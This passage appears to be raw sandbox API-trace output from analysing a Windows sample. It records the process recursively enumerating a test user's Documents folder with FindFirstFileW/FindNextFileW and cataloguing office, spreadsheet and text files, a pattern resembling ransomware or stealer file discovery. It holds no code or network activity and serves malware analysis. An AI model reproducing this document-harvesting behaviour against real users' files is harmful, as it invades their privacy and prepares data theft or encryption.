lpMsg=0x87ea1c) returned 0 [0157.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.469] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.469] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.469] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6050f080, ftCreationTime.dwHighDateTime=0x1d5dbad, ftLastAccessTime.dwLowDateTime=0x156f28d0, ftLastAccessTime.dwHighDateTime=0x1d5e282, ftLastWriteTime.dwLowDateTime=0x156f28d0, ftLastWriteTime.dwHighDateTime=0x1d5e282, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.472] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6050f080, ftCreationTime.dwHighDateTime=0x1d5dbad, ftLastAccessTime.dwLowDateTime=0x156f28d0, ftLastAccessTime.dwHighDateTime=0x1d5e282, ftLastWriteTime.dwLowDateTime=0x156f28d0, ftLastWriteTime.dwHighDateTime=0x1d5e282, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.472] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76dfe470, ftCreationTime.dwHighDateTime=0x1d5dae8, ftLastAccessTime.dwLowDateTime=0x7a81de0, ftLastAccessTime.dwHighDateTime=0x1d5db81, ftLastWriteTime.dwLowDateTime=0x7a81de0, ftLastWriteTime.dwHighDateTime=0x1d5db81, nFileSizeHigh=0x0, nFileSizeLow=0xd24a, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="-V0 o3_nR9rc3_2DHH4.csv", cAlternateFileName="-V0O3_~1.CSV")) returned 1 [0157.472] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.472] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.472] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.472] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.472] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.472] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.472] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.472] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.472] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.473] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6abb3490, ftCreationTime.dwHighDateTime=0x1d5df7c, ftLastAccessTime.dwLowDateTime=0xc074c380, ftLastAccessTime.dwHighDateTime=0x1d5de08, ftLastWriteTime.dwLowDateTime=0xc074c380, ftLastWriteTime.dwHighDateTime=0x1d5de08, nFileSizeHigh=0x0, nFileSizeLow=0xd070, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="8KAz.docx", cAlternateFileName="8KAZ~1.DOC")) returned 1 [0157.473] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.473] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.473] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.473] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.473] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.473] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.473] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d7e0f10, ftCreationTime.dwHighDateTime=0x1d5e5c6, ftLastAccessTime.dwLowDateTime=0xf64cede0, ftLastAccessTime.dwHighDateTime=0x1d5e360, ftLastWriteTime.dwLowDateTime=0xf64cede0, ftLastWriteTime.dwHighDateTime=0x1d5e360, nFileSizeHigh=0x0, nFileSizeLow=0x17fea, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="B1Y6naM2jHwq3MoZolB.ots", cAlternateFileName="B1Y6NA~1.OTS")) returned 1 [0157.473] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.473] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.473] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.473] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.473] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.473] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.473] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd471860, ftCreationTime.dwHighDateTime=0x1d5e4c0, ftLastAccessTime.dwLowDateTime=0xe53b1530, ftLastAccessTime.dwHighDateTime=0x1d5e177, ftLastWriteTime.dwLowDateTime=0xe53b1530, ftLastWriteTime.dwHighDateTime=0x1d5e177, nFileSizeHigh=0x0, nFileSizeLow=0x15e3b, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="f2lgxu.rtf", cAlternateFileName="")) returned 1 [0157.473] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.473] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.473] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.473] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.474] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.474] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.474] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f0f0f0, ftCreationTime.dwHighDateTime=0x1d5e547, ftLastAccessTime.dwLowDateTime=0x24d4fc30, ftLastAccessTime.dwHighDateTime=0x1d5dd39, ftLastWriteTime.dwLowDateTime=0x24d4fc30, ftLastWriteTime.dwHighDateTime=0x1d5dd39, nFileSizeHigh=0x0, nFileSizeLow=0x2691, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="G856.ots", cAlternateFileName="")) returned 1 [0157.474] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.474] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.474] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.474] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.474] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.474] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.474] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e07ddb0, ftCreationTime.dwHighDateTime=0x1d5e195, ftLastAccessTime.dwLowDateTime=0x9abbf600, ftLastAccessTime.dwHighDateTime=0x1d5de7f, ftLastWriteTime.dwLowDateTime=0x9abbf600, ftLastWriteTime.dwHighDateTime=0x1d5de7f, nFileSizeHigh=0x0, nFileSizeLow=0x58fc, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="GvoASfHILqm4y.odt", cAlternateFileName="GVOASF~1.ODT")) returned 1 [0157.474] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.474] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.474] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.474] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.474] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.474] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.474] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a0ad840, ftCreationTime.dwHighDateTime=0x1d5e7b0, ftLastAccessTime.dwLowDateTime=0x96ac91b0, ftLastAccessTime.dwHighDateTime=0x1d5dda2, ftLastWriteTime.dwLowDateTime=0x96ac91b0, ftLastWriteTime.dwHighDateTime=0x1d5dda2, nFileSizeHigh=0x0, nFileSizeLow=0x9f51, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="hvT5kT0PFopfwSD QzN.pps", cAlternateFileName="HVT5KT~1.PPS")) returned 1 [0157.474] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.474] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.475] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.475] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.475] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.475] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.475] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4787dab0, ftCreationTime.dwHighDateTime=0x1d5e1ba, ftLastAccessTime.dwLowDateTime=0x2d78f050, ftLastAccessTime.dwHighDateTime=0x1d5e025, ftLastWriteTime.dwLowDateTime=0x2d78f050, ftLastWriteTime.dwHighDateTime=0x1d5e025, nFileSizeHigh=0x0, nFileSizeLow=0x9094, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="isuTz.pps", cAlternateFileName="")) returned 1 [0157.475] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.475] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.475] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.475] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.475] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.475] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.475] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f218dd0, ftCreationTime.dwHighDateTime=0x1d5de91, ftLastAccessTime.dwLowDateTime=0xe8234710, ftLastAccessTime.dwHighDateTime=0x1d5e071, ftLastWriteTime.dwLowDateTime=0xe8234710, ftLastWriteTime.dwHighDateTime=0x1d5e071, nFileSizeHigh=0x0, nFileSizeLow=0x16989, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Ob0CMu.csv", cAlternateFileName="")) returned 1 [0157.475] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.475] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.475] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.475] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.475] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.475] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.475] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47989120, ftCreationTime.dwHighDateTime=0x1d5e7dc, ftLastAccessTime.dwLowDateTime=0xba40d220, ftLastAccessTime.dwHighDateTime=0x1d5e69a, ftLastWriteTime.dwLowDateTime=0xba40d220, ftLastWriteTime.dwHighDateTime=0x1d5e69a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="orhLGiSQMqRNAIhM", cAlternateFileName="ORHLGI~1")) returned 1 [0157.476] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.476] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.476] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.476] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.476] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.476] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.476] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\*", lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47989120, ftCreationTime.dwHighDateTime=0x1d5e7dc, ftLastAccessTime.dwLowDateTime=0xba40d220, ftLastAccessTime.dwHighDateTime=0x1d5e69a, ftLastWriteTime.dwLowDateTime=0xba40d220, ftLastWriteTime.dwHighDateTime=0x1d5e69a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90afd8 [0157.498] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47989120, ftCreationTime.dwHighDateTime=0x1d5e7dc, ftLastAccessTime.dwLowDateTime=0xba40d220, ftLastAccessTime.dwHighDateTime=0x1d5e69a, ftLastWriteTime.dwLowDateTime=0xba40d220, ftLastWriteTime.dwHighDateTime=0x1d5e69a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.499] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x581b1190, ftCreationTime.dwHighDateTime=0x1d5ddd1, ftLastAccessTime.dwLowDateTime=0xd7475ce0, ftLastAccessTime.dwHighDateTime=0x1d5dae2, ftLastWriteTime.dwLowDateTime=0xd7475ce0, ftLastWriteTime.dwHighDateTime=0x1d5dae2, nFileSizeHigh=0x0, nFileSizeLow=0xa052, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="1usRK9.rtf", cAlternateFileName="")) returned 1 [0157.499] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.499] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.499] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.499] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.499] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.499] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.499] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.499] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.499] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.499] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99398460, ftCreationTime.dwHighDateTime=0x1d5e685, ftLastAccessTime.dwLowDateTime=0xa24a8550, ftLastAccessTime.dwHighDateTime=0x1d5dc43, ftLastWriteTime.dwLowDateTime=0xa24a8550, ftLastWriteTime.dwHighDateTime=0x1d5dc43, nFileSizeHigh=0x0, nFileSizeLow=0x108d, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="g4FThfJBWB6.odt", cAlternateFileName="G4FTHF~1.ODT")) returned 1 [0157.500] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.500] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.500] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.500] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.500] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.500] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.501] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26da4000, ftCreationTime.dwHighDateTime=0x1d5d931, ftLastAccessTime.dwLowDateTime=0x4fe3fc70, ftLastAccessTime.dwHighDateTime=0x1d5e5cf, ftLastWriteTime.dwLowDateTime=0x4fe3fc70, ftLastWriteTime.dwHighDateTime=0x1d5e5cf, nFileSizeHigh=0x0, nFileSizeLow=0x6a9d, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="hiVdX.odt", cAlternateFileName="")) returned 1 [0157.501] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.501] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.501] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.501] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.501] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.501] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.501] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x820ae690, ftCreationTime.dwHighDateTime=0x1d5dced, ftLastAccessTime.dwLowDateTime=0xd1f6a5e0, ftLastAccessTime.dwHighDateTime=0x1d5e6b1, ftLastWriteTime.dwLowDateTime=0xd1f6a5e0, ftLastWriteTime.dwHighDateTime=0x1d5e6b1, nFileSizeHigh=0x0, nFileSizeLow=0x5d90, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="izNb7DZLOKQSO_3S.pps", cAlternateFileName="IZNB7D~1.PPS")) returned 1 [0157.501] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.501] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.501] 